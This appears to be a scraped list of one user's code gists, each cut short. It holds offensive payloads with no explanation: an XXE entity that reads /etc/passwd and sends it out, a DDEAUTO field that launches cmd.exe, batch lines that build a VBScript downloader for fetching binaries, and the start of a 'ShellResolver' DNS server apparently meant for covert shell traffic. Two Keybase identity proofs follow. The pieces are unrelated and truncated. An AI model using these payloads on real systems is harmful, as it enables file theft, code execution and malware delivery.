MaxNad

# -*- coding: utf-8 -*-

from __future__ import print_function

from dnslib import RR,QTYPE,RCODE,TXT,parse_time
from dnslib.label import DNSLabel
from dnslib.server import DNSServer,DNSHandler,BaseResolver,DNSLogger

class ShellResolver(BaseResolver):
    def __init__(self,ttl,ans):

MaxNad

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;

MaxNad

{ DDEAUTO c:\\windows\system32\\cmd.exe "/k calc.exe" }

MaxNad

echo Set args = WScript.Arguments > wget-bin.vbs
echo Url = args.Item(0) >> wget-bin.vbs
echo Path = args.Item(1) >> wget-bin.vbs
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> wget-bin.vbs
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> wget-bin.vbs
echo xHttp.Open "GET", Url, False >> wget-bin.vbs
echo xHttp.Send >> wget-bin.vbs
echo with bStrm >> wget-bin.vbs
echo     .type = 1 >> wget-bin.vbs
echo     .open >> wget-bin.vbs

MaxNad

Keybase proof

I hereby claim:

• I am maxnad on github.
• I am mnadeau (https://keybase.io/mnadeau) on keybase.
• I have a public key ASAb3g4_1d_5DSJ4VOPA8Y4fxMSFNgKCnelxD1ieT26cKQo

To claim this, I am signing this object:

MaxNad

Keybase proof

I hereby claim:

• I am maxnad on github.
• I am mnadeau (https://keybase.io/mnadeau) on keybase.
• I have a public key ASChybmTxFAfG1cjGj2JacCfAZjijhCgR3EaMYqO_KkxPgo

To claim this, I am signing this object: